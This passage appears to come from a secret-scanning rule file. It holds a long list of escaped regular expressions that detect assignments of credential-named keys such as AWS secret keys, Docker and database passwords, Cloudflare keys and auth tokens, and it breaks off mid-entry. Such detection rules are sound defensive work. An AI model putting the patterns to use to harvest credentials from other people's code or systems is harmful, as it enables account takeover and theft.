\"(?i)[\\\"']?doordash[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dockerhubpassword[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dockerhub[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?postgres[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?passwd[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?hub[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?digitalocean[_-]?ssh[_-]?key[_-]?ids[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?digitalocean[_-]?ssh[_-]?key[_-]?body[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?digitalocean[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dgpg[_-]?passphrase[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?deploy[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?deploy[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?deploy[_-]?secure[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?deploy[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ddgc[_-]?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ddg[_-]?test[_-]?email[_-]?pw[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ddg[_-]?test[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?pw[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?connection[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n 
]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?datadog[_-]?app[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?datadog[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?port[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?danger[_-]?github[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cypress[_-]?record[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?coverity[_-]?scan[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?coveralls[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?coveralls[_-]?repo[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?coveralls[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cos[_-]?secrets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?conversation[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?conversation[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?contentful[_-]?v2[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?test[_-]?org[_-]?cma[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?php[_-]?management[_-]?test[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?integration[_-]?management[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?cma[_-]?test[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?consumerkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?consumer[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?conekta[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?coding[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?codecov[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?codeclimate[_-]?repo[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?codacy[_-]?project[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cocoapods[_-]?trunk[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n 
]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cocoapods[_-]?trunk[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cn[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cn[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?clu[_-]?ssh[_-]?private[_-]?key[_-]?base64[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?clu[_-]?repo[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudinary[_-]?url[_-]?staging[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudinary[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudflare[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudflare[_-]?auth[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudflare[_-]?auth[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudflare[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?service[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?processed[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?parsed[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?order[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?cloudant[_-]?instance[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?audited[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?archived[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloud[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?clojars[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cli[_-]?e2e[_-]?cma[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?claimr[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?claimr[_-]?superuser[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?claimr[_-]?db[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?claimr[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ci[_-]?user[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ci[_-]?server[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ci[_-]?registry[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ci[_-]?project[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ci[_-]?deploy[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?chrome[_-]?refresh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?chrome[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cheverny[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cf[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?certificate[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?censys[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cattle[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cattle[_-]?agent[_-]?instance[_-]?auth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cattle[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cargo[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cache[_-]?s3[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bx[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bx[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bundlesize[_-]?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?built[_-]?branch[_-]?deploy[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n 
]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?browserstack[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?browser[_-]?stack[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?brackets[_-]?repo[_-]?oauth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?pwd[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?pass[_-]?prod[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?auth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintraykey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintray[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintray[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintray[_-]?gpg[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintray[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintray[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?b2[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?b2[_-]?app[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?awssecretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?awscn[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?awscn[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?awsaccesskeyid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?ses[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?ses[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?secrets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?config[_-]?secretaccesskey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?config[_-]?accesskeyid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?access[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?author[_-]?npm[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?author[_-]?email[_-]?addr[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?auth0[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?auth0[_-]?api[_-]?clientsecret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?assistant[_-]?iam[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n 